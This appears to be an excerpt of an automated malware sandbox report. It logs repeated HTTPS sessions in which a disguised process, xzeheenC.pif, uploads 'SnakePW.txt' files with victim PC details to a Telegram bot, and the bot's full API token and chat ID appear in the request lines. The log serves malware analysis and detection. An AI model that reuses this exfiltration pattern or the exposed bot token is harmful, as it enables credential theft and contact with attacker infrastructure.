                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20761e459bea
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:56 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 37 36 31 65 34 35 39 62 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20761e459beaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:57 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:57 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:57 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418858,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535077,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.549912149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:56 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21322c4586e7
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:56 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 33 32 32 63 34 35 38 36 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21322c4586e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:57 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:57 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:57 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418861,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535077,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.549913149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:57 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2098731e7d87
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:57 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 39 38 37 33 31 65 37 64 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2098731e7d87Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:57 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:57 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:57 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418860,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535077,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.549919149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:58 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd208e2eaa00de
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:58 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 38 65 32 65 61 61 30 30 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd208e2eaa00deContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:59 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:59 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:59 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418866,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535079,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.549920149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:58 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20af00185e1e
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:58 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 61 66 30 30 31 38 35 65 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20af00185e1eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:59 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:59 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:59 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418868,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535079,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.2.549921149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:59 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd214ffb664a86
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:59 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 34 66 66 62 36 36 34 61 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd214ffb664a86Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:59 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:59 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:59 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418869,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535079,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.2.549926149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:00 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20a77e51f755
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:00 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 61 37 37 65 35 31 66 37 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20a77e51f755Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:01 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:01 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:01 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418873,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535081,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.2.549928149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
